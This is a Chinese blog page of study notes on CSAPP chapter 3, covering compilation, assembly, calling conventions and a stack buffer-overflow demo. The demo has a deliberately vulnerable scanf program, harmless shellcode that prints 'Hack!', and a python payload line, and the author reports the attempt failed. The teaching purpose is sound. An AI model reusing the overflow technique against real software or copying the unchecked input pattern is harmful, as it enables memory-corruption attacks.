

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/avatar_small_round.png">
  <link rel="icon" href="/img/avatar_small_round.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Horizon">
  <meta name="keywords" content="">
  
    <meta name="description" content="CSAPP 第三章的笔记, 包括初级汇编">
<meta property="og:type" content="article">
<meta property="og:title" content="CSAPP 第三章 笔记">
<meta property="og:url" content="https://horizonchaser.github.io/2021/08/31/CSAPP-Chap3-%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="Horizon Blog">
<meta property="og:description" content="CSAPP 第三章的笔记, 包括初级汇编">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://horizonchaser.github.io/2021/08/31/CSAPP-Chap3-%E7%AC%94%E8%AE%B0/20210903234411.png">
<meta property="og:image" content="https://horizonchaser.github.io/2021/08/31/CSAPP-Chap3-%E7%AC%94%E8%AE%B0/20210904201815.png">
<meta property="og:image" content="https://horizonchaser.github.io/2021/08/31/CSAPP-Chap3-%E7%AC%94%E8%AE%B0/20210904214722.png">
<meta property="article:published_time" content="2021-08-31T21:41:22.000Z">
<meta property="article:modified_time" content="2024-05-14T15:44:30.995Z">
<meta property="article:author" content="Horizon">
<meta property="article:tag" content="读书笔记">
<meta property="article:tag" content="CSAPP">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://horizonchaser.github.io/2021/08/31/CSAPP-Chap3-%E7%AC%94%E8%AE%B0/20210903234411.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>CSAPP 第三章 笔记 - Horizon Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"horizonchaser.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/rss2.xml" title="Horizon Blog" type="application/rss+xml">
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 60vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Horizon Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/bangumis/index.html">
                <i class="iconfont icon-bilibili-fill"></i>
                <span>Bangumi</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-friends"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/index_banner.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="CSAPP 第三章 笔记"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2021-08-31 21:41" pubdate>
          2021年8月31日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          29 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">CSAPP 第三章 笔记</h1>
            
              <p class="note note-info">
                
                  
                    本文最后更新于：2024年5月14日 下午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <blockquote>
<p>CSAPP 采用的是 x64 ATT 汇编, 然而平时用的 IDA 什么的都是 MASM 汇编… 有点头大<br>
话说回来, 都会肯定不是坏事… 大概</p>
</blockquote>
<!-- @import "[TOC]" {cmd="toc" depthFrom=1 depthTo=6 orderedList=false} -->
<!-- code_chunk_output -->
<ul>
<li><a href="#%E7%BC%96%E8%AF%91-%E6%B1%87%E7%BC%96%E4%B8%8E%E5%8F%8D%E6%B1%87%E7%BC%96">编译 汇编与反汇编</a>
<ul>
<li><a href="#%E7%BC%96%E8%AF%91">编译</a></li>
<li><a href="#%E5%8F%8D%E6%B1%87%E7%BC%96">反汇编</a></li>
</ul>
</li>
<li><a href="#%E6%B1%87%E7%BC%96%E8%AF%AD%E8%A8%80-%E5%88%9D%E6%AD%A5">汇编语言 初步</a>
<ul>
<li><a href="#%E6%95%B0%E6%8D%AE%E6%A0%BC%E5%BC%8F">数据格式</a></li>
<li><a href="#%E5%85%B3%E4%BA%8E-lea-%E6%8C%87%E4%BB%A4">关于 LEA 指令</a></li>
<li><a href="#%E6%9D%A1%E4%BB%B6%E5%88%A4%E6%96%AD">条件判断</a>
<ul>
<li><a href="#cmp-%E6%8C%87%E4%BB%A4">CMP 指令</a></li>
<li><a href="#test-%E6%8C%87%E4%BB%A4">TEST 指令</a></li>
</ul>
</li>
<li><a href="#switch-%E7%9A%84%E5%AE%9E%E7%8E%B0">switch 的实现</a></li>
</ul>
</li>
<li><a href="#%E8%B0%83%E7%94%A8%E8%BF%87%E7%A8%8B%E9%97%B4%E7%9A%84%E6%95%B0%E6%8D%AE%E4%BC%A0%E9%80%92">调用过程间的数据传递</a>
<ul>
<li><a href="#%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%94%BB%E5%87%BB">缓冲区溢出攻击</a>
<ul>
<li><a href="#%E4%B8%80%E4%B8%AA%E5%A4%B1%E8%B4%A5%E7%9A%84%E4%BE%8B%E5%AD%90">一个失败的例子</a></li>
</ul>
</li>
<li><a href="#%E5%AF%B9%E6%8A%97%E6%8E%AA%E6%96%BD">对抗措施</a></li>
</ul>
</li>
</ul>
<!-- /code_chunk_output -->
<h1 id="编译-汇编与反汇编"><a class="markdownIt-Anchor" href="#编译-汇编与反汇编"></a> 编译 汇编与反汇编</h1>
<h2 id="编译"><a class="markdownIt-Anchor" href="#编译"></a> 编译</h2>
<p><code>gcc -Og -o [output file] [source files]</code></p>
<p>包括四个步骤: 预处理, 编译, 汇编, 链接</p>
<ul>
<li><strong>预处理</strong>
<ul>
<li>把 <code>#</code> 开头的预处理指令展开, 比如头文件展开, 宏展开</li>
<li>处理完了也是 <code>*.c</code> 或者 <code>*.cpp</code></li>
<li><code>gcc -E [source files] -o [output file]</code></li>
</ul>
</li>
<li><strong>编译</strong>
<ul>
<li>把预处理完的源代码转化成汇编代码</li>
<li>对于 <code>gcc</code>, 默认是 ATT 格式, 用 <code>-masm=intel</code> 指定采用 Intel 格式</li>
<li><code>gcc -S &lt;source&gt;.c -o &lt;output&gt;.s</code></li>
</ul>
</li>
<li><strong>汇编</strong>
<ul>
<li>把汇编代码转为二进制的目标文件</li>
<li><code>gcc -c &lt;source&gt;.c -o &lt;output&gt;.o</code></li>
</ul>
</li>
<li><strong>链接</strong>
<ul>
<li>将该目标文件与其他目标文件、库文件、启动文件等链接起来生成可执行文件</li>
<li><code>gcc &lt;object&gt;.o -o &lt;executable&gt;</code></li>
</ul>
</li>
</ul>
<h2 id="反汇编"><a class="markdownIt-Anchor" href="#反汇编"></a> 反汇编</h2>
<p>用 <code>objdump</code></p>
<ul>
<li><code>-d &lt;file(s)&gt;</code>: 将代码段反汇编</li>
<li><code>-S &lt;file(s)&gt;</code>: 将代码段反汇编的同时，将反汇编代码与源代码交替显示
<ul>
<li>编译时需要使用-g- 参数，生成调试信息</li>
</ul>
</li>
<li><code>-C &lt;file(s)&gt;</code>: 将C++符号名逆向解析</li>
<li><code>-l &lt;file(s)&gt;</code>: 反汇编代码中插入文件名和行号</li>
<li><code>-j section &lt;file(s)&gt;</code>: 仅反汇编指定的section</li>
</ul>
<h1 id="汇编语言-初步"><a class="markdownIt-Anchor" href="#汇编语言-初步"></a> 汇编语言 初步</h1>
<h2 id="数据格式"><a class="markdownIt-Anchor" href="#数据格式"></a> 数据格式</h2>
<blockquote>
<p>为什么一个字是两字节?</p>
<p>实际上, 一个字并不一定是两个字节 - 比如 ARM 的 NEON 指令集下, 一个字就是 32 位 (四字节). 但是在 x86/x64 环境下, 一个字规定为两字节, 从 8086 开始就是这样了<br>
另外, 一个字节也不一定是 8 位…</p>
<p>Reference: <a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/28066462/how-many-bits-is-a-word">StackOverflow</a></p>
</blockquote>
<table>
<thead>
<tr>
<th>名称</th>
<th>长度 (字节)</th>
<th>ATT格式后缀</th>
<th>MASM中的类型</th>
</tr>
</thead>
<tbody>
<tr>
<td>字节</td>
<td>1</td>
<td>b</td>
<td>BYTE</td>
</tr>
<tr>
<td>字</td>
<td>2</td>
<td>w</td>
<td>WORD</td>
</tr>
<tr>
<td>双字</td>
<td>4</td>
<td>l</td>
<td>DWORD</td>
</tr>
<tr>
<td>四字</td>
<td>8</td>
<td>q</td>
<td>QWORD</td>
</tr>
</tbody>
</table>
<h2 id="关于-lea-指令"><a class="markdownIt-Anchor" href="#关于-lea-指令"></a> 关于 LEA 指令</h2>
<p><code>lea</code> 指令名为 “加载有效地址” (load effective address), 实际上也可以进行简单的四则运算 (利用那些繁杂但必要的寻址方式).</p>
<p>相对于使用多条<code>add</code> <code>sub</code>指令, 简单的四则运算用 <code>lea</code> 显然更便捷 - 这个时候和地址计算就没任何关系了</p>
<blockquote>
<p>这点坑了我半天</p>
</blockquote>
<h2 id="条件判断"><a class="markdownIt-Anchor" href="#条件判断"></a> 条件判断</h2>
<h3 id="cmp-指令"><a class="markdownIt-Anchor" href="#cmp-指令"></a> CMP 指令</h3>
<p>和 <code>SUB</code> 进行的运算一样, 但不改变操作数寄存器的值</p>
<h3 id="test-指令"><a class="markdownIt-Anchor" href="#test-指令"></a> TEST 指令</h3>
<p>和 <code>AND</code> 进行的运算一样, 但不改变操作数寄存器的值</p>
<p>所以 <code>test %rax, %rax</code> 这类两个操作数相同的指令可以用来<strong>判断其值的正负</strong></p>
<h2 id="switch-的实现"><a class="markdownIt-Anchor" href="#switch-的实现"></a> switch 的实现</h2>
<p>在分支较多且数值较为接近的时候<strong>可能</strong>会采用跳转表</p>
<h1 id="调用过程间的数据传递"><a class="markdownIt-Anchor" href="#调用过程间的数据传递"></a> 调用过程间的数据传递</h1>
<p>在 x86-64 中, 前六个参数可以通过寄存器传递, 从左到右顺序为 <code>rdi rsi rdx rcx r8~r15</code></p>
<p><code>rbx rbp r12~r15</code> 为<strong>被调用者保存的寄存器</strong>, 也就是被调用者需要保证在被调用前后这些寄存器的值不变; 其他所有寄存器 (<code>rbp</code> 除外) 为调用者保存的寄存器, 也就是说, 被调用者可以修改这些寄存器的值, 因此调用者在调用其他函数前应先由自己保护好它们.</p>
<p>如果参数多于六个 <s>(什么函数会这么写啊…)</s>, 剩下的参数按照从左到右的顺序依次压入栈中 (记得保证对齐), 然后再把调用者的返回地址入栈即可.</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs plain">     Bottom<br>     (HIGH)<br>+---------------+---------+<br>|               |         v<br>|  parameters   |     Frame of<br>|     7~n       |      caller<br>+---------------+         ^<br>|  return addr  |         |<br>+---------------+---------+<br>|               |         |<br>|    saved      |         |<br>|  regesiters   |         |<br>|  (rbp rbx..)  |         |<br>|               |<br>+---------------+         |<br>|               |         v<br>|  local vars   |     Frame of<br>|               |      callee<br>+---------------+         ^<br>|               |         |<br>| para for next |         |<br>|   function    |         |<br>|               |         |<br>+---------------+---------+<br>      Top<br>     (LOW)<br></code></pre></td></tr></tbody></table></figure>
<p>另外, 当参数为数组, 或函数中使用到了参数的地址, 这些参数也会保存在栈中, 例如下图</p>
<p><img src="20210903234411.png" srcset="/img/loading.gif" lazyload alt="demo"></p>
<blockquote>
<p>根据书上的说法, 当参数为结构体时也会将其保存到栈中, 但根据测试对于较为简单的结构体, 编译器仍然会将其保存到寄存器中, 参见 <a target="_blank" rel="noopener" href="https://godbolt.org/z/ax8666aGn">GodBolt的结果</a></p>
</blockquote>
<p>注意, <strong>这些保存到栈中的参数, 和 调用者的返回地址 都属于调用者的栈帧</strong></p>
<h2 id="缓冲区溢出攻击"><a class="markdownIt-Anchor" href="#缓冲区溢出攻击"></a> 缓冲区溢出攻击</h2>
<p>我们注意到, 返回地址在局部变量的 “上方” (指较高地址的位置), 所以如果我们通过对局部变量进行构造好的且足够长的赋值, 就有可能把返回地址覆盖掉. 这样, 当函数返回时就会跳转到我们指定的地址, 实现控制.</p>
<p>容易想到, 一种简单的溢出是利用 <code>gets()</code> 函数没有指定最大长度的漏洞 - 它会一直从标准输入流中读取, 直到遇到回车. 同时, 如果我们能够输入汇编指令的话, 就可以让处理器跳转到我们自己的指令!</p>
<p>我们精心构造的这种输入, 一般被称作 <code>shellcode</code>.</p>
<h3 id="一个失败的例子"><a class="markdownIt-Anchor" href="#一个失败的例子"></a> 一个失败的例子</h3>
<p>来看下面一段代码.</p>
<figure class="highlight c"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> {<br>    <span class="hljs-type">char</span> name[<span class="hljs-number">64</span>];<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"What's your name?"</span>);<br>    <span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%s"</span>, name);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Hello, %s!\n"</span>, name);<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></tbody></table></figure>
<p>在这里, <code>scanf</code> 会接受一个字符串的输入, 并保存到 <code>name</code> 中. 如果输入足够长, 那就可以将返回地址覆盖掉. 把它另存为 <code>victim.c</code>, 编译一下, 拿 <code>objdump</code> 反汇编看看.</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs plain">0000000000401156 &lt;main&gt;:<br>  401156:       f3 0f 1e fa             endbr64 <br>  40115a:       55                      push   rbp<br>  40115b:       48 89 e5                mov    rbp,rsp<br>  40115e:       48 83 ec 40             sub    rsp,0x40<br>  401162:       48 8d 45 c0             lea    rax,[rbp-0x40]<br>  401166:       48 89 c6                mov    rsi,rax<br>  401169:       48 8d 3d 94 0e 00 00    lea    rdi,[rip+0xe94]        # 402004 &lt;_IO_stdin_used+0x4&gt;<br>  401170:       b8 00 00 00 00          mov    eax,0x0<br>  401175:       e8 e6 fe ff ff          call   401060 &lt;__isoc99_scanf@plt&gt;<br>  40117a:       48 8d 45 c0             lea    rax,[rbp-0x40]<br>  40117e:       48 89 c6                mov    rsi,rax<br>  401181:       48 8d 3d 7f 0e 00 00    lea    rdi,[rip+0xe7f]        # 402007 &lt;_IO_stdin_used+0x7&gt;<br>  401188:       b8 00 00 00 00          mov    eax,0x0<br>  40118d:       e8 be fe ff ff          call   401050 &lt;printf@plt&gt;<br>  401192:       b8 00 00 00 00          mov    eax,0x0<br>  401197:       c9                      leave  <br>  401198:       c3                      ret    <br>  401199:       0f 1f 80 00 00 00 00    nop    DWORD PTR [rax+0x0]<br></code></pre></td></tr></tbody></table></figure>
<p>可以看到, <code>sub rsp,0x40</code> 这条指令, 为 <code>name</code> 数组在栈上开辟了 64 字节大小的空间. 由此我们可以画出栈上的空间分配情况, 如下图</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs plain">+--------------+<br>|     ...      |<br>+--------------+<br>|              |<br>|  return addr |<br>|              |<br>+--------------+ &lt;-- RSP should points here before ret<br>|              |<br>|   prev rbp   | &lt;-- 8 bytes long<br>|              |<br>+--------------+ &lt;-- RBP should points here<br>|     ...      |<br>+--------------+<br>|              |<br>|   name[64]   |<br>|              |<br>+--------------+ &lt;-- RBP-0x40<br></code></pre></td></tr></tbody></table></figure>
<p>用 <code>gdb</code> 调试一下, 确认我们的猜想对不对. 首先, <code>gdb -q ./victim</code> 启动调试, 然后 <code>b *main</code>, 在 <code>main</code> 函数的第一条指令下断点, <code>r</code> 开始运行.</p>
<p><img src="20210904201815.png" srcset="/img/loading.gif" lazyload alt="gdb pic"></p>
<p>可以看到, 这时 <code>RSP = 0x7fffffffde58</code>, 在下一条 <code>RBP</code> 入栈后会变为 <code>de50</code>. 用 <code>p &amp;name[0]</code> 查看 <code>name</code> 数组的地址, 发现是 <code>0x7fffffffde10</code>. 由此确认, 返回地址与 <code>name[0]</code> 之间的长度为 <code>0x48 == 72</code> 字节.</p>
<p>接下来构造 <code>shellcode</code>, 我们的目标是输出一个字符串 <code>Hack!</code>, 写出如下的汇编代码:</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs ASM">[section .text]<br>        global _start<br><br>_start:<br>        jmp END<br>BEGIN:<br>        mov rax, 1<br>        mov rdi, 1<br>        pop rsi         ; addr of string popped to RSI as arg of syscall<br>        mov rdx, 5<br>        syscall<br><br>        mov rax, 0x3c<br>        mov rdi, 0<br>        syscall<br>END:<br>        call BEGIN      ; addr of string pushed into stack<br>        DB "Hack!"<br></code></pre></td></tr></tbody></table></figure>
<p>编译 <code>nasm -f elf64 shell.asm</code>, 链接 <code>ld -s -o shell shell.o</code>, 然后 <code>objdump -d shell -M intel</code> 提取二进制的机器码:</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs ASM">Disassembly of section .text:<br><br>0000000000401000 &lt;.text&gt;:<br>  401000:       eb 1e                   jmp    0x401020<br>  401002:       b8 01 00 00 00          mov    eax,0x1<br>  401007:       bf 01 00 00 00          mov    edi,0x1<br>  40100c:       5e                      pop    rsi<br>  40100d:       ba 05 00 00 00          mov    edx,0x5<br>  401012:       0f 05                   syscall <br>  401014:       b8 3c 00 00 00          mov    eax,0x3c<br>  401019:       bf 00 00 00 00          mov    edi,0x0<br>  40101e:       0f 05                   syscall <br>  401020:       e8 dd ff ff ff          call   0x401002<br>  401025:       48 61                   rex.W (bad) <br>  401027:       63 6b 21                movsxd ebp,DWORD PTR [rbx+0x21]<br></code></pre></td></tr></tbody></table></figure>
<p>这份 shellcode 的长度只有 42 字节, 因此我们还需要再填充 30 字节的数据, 之后才是用来覆盖返回地址的 <code>&amp;name[0]</code>. 因为其中有很多不可打印的字符, 所以我们用 python 把它输出到一个文件, 然后从文件作为输入.</p>
<figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">python -c 'print ("\xeb\x1e\xb8\x01\x00\x00\x00\xbf\x01\x00\x00\x00\x5e\xba\x05\x00\x00\x00\x0f\x05\xb8\x3c\x00\x00\x00\xbf\x00\x00\x00\x00\x0f\x05\xe8\xdd\xff\xff\xff\x48\x61\x63\x6b\x21" + "\xdb"*30 + "\x10\xde\xff\xff\xff\x7f\x00\x00")' &gt; shellcode<br></code></pre></td></tr></tbody></table></figure>
<blockquote>
<p>注意小端序</p>
</blockquote>
<p>这次尝试以失败告终, 已经确定成功覆盖了栈中之前保存的 <code>RBP</code>, 理论上返回地址也已经被覆盖, 但是就是无法跳转, 报告段错误… 看下图的 <code>EBP</code> 的值 (为了确定不是 x86-64 的问题, 使用 x86 重新编译了一次, shellcode 也重新写了一份)</p>
<p><img src="20210904214722.png" srcset="/img/loading.gif" lazyload alt="failed-try😭"></p>
<blockquote>
<p>大概是还有保护措施没有关掉…</p>
</blockquote>
<blockquote>
<p>关于 x86 系列栈指针寄存器的演进历史, 参见 <a target="_blank" rel="noopener" href="https://stackoverflow.com/a/31425990/13804105">StackOverflow</a></p>
</blockquote>
<h2 id="对抗措施"><a class="markdownIt-Anchor" href="#对抗措施"></a> 对抗措施</h2>
<p>//TODO</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0/">#读书笔记</a>
      
        <a href="/tags/CSAPP/">#CSAPP</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>CSAPP 第三章 笔记</div>
      <div>https://horizonchaser.github.io/2021/08/31/CSAPP-Chap3-笔记/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Horizon</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2021年8月31日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
                <a target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="NC - 非商业性使用">
                    <i class="iconfont icon-nc"></i>
                  </span>
                </a>
              
                <a target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="SA - 相同方式共享">
                    <i class="iconfont icon-sa"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/10/26/%E9%95%BF%E5%AE%89%E6%9D%AF2021-Writeup/" title="长安杯2021 Writeup">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">长安杯2021 Writeup</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/06/13/CS-Network-Review-and-Summary/" title="CS Network Review and Summary">
                        <span class="hidden-mobile">CS Network Review and Summary</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
    <div id="giscus" class="giscus"></div>
    <script type="text/javascript">
      Fluid.utils.loadComments('#giscus', function() {
